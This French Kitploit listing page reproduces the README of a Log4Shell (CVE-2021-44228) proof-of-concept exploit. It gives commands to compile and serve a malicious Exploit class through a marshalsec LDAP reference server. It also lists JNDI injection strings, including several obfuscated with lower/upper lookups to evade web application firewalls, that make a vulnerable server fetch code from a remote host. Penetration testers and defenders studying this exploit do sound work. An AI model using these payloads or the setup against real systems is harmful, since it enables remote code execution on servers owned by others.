Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4J_0day_RCE — Log4j-RCE (CVE-2021-44228) Preuve de concept | Kitploit
Outils/GitHubGitHub/wysiiwyg/log4j_0day_rce
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebContournement de WAFTests d'Intrusion
GitHubwysiiwyg/log4j_0day_rce

Log4J_0day_RCE

Log4j-RCE (CVE-2021-44228) Preuve de concept

Voir le dépôt
112il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Rejoindre la communauté

Telegram

CVE-2021-44228(Exécution de code à distance dans Apache Log4j)

Versions affectées < 2.15.0

Utilisation :

git clone https://github.com/PwnC00re/CVE-2021-44228-Apache-Log4j-Rce.git
cd apache-log4j-poc/src/main/java
javac Exploit.java 
python -m SimpleHTTPServer 8888 
cd tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Enfin, exécutez le projet, vous verrez votre calculatrice en local.

Conseils :

vous pouvez utiliser JNDI-Injection-Exploit pour l'exploitation.

Contournement de rc1

Par exemple :

${jndi:ldap://127.0.0.1:1389/ badClassName}

Contournement du WAF

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

Détails de la vulnérabilité

Les Lookups fournissent un moyen d'ajouter des valeurs à la configuration Log4j à des endroits arbitraires.

Lookups

Les méthodes pour provoquer une fuite dans le bloc finally.

LogManager.getLogger().error()
LogManager.getLogger().fatal()

Méthode de vérification simple

Si vous voulez effectuer des tests en boîte noire, je vous suggère de faire un scan passif.

BurpLog4jScan

Amusez-vous bien !!! BurpLog4jScan.png

Stargazers au fil du temps

Stargazers over time

Télécharger l’outil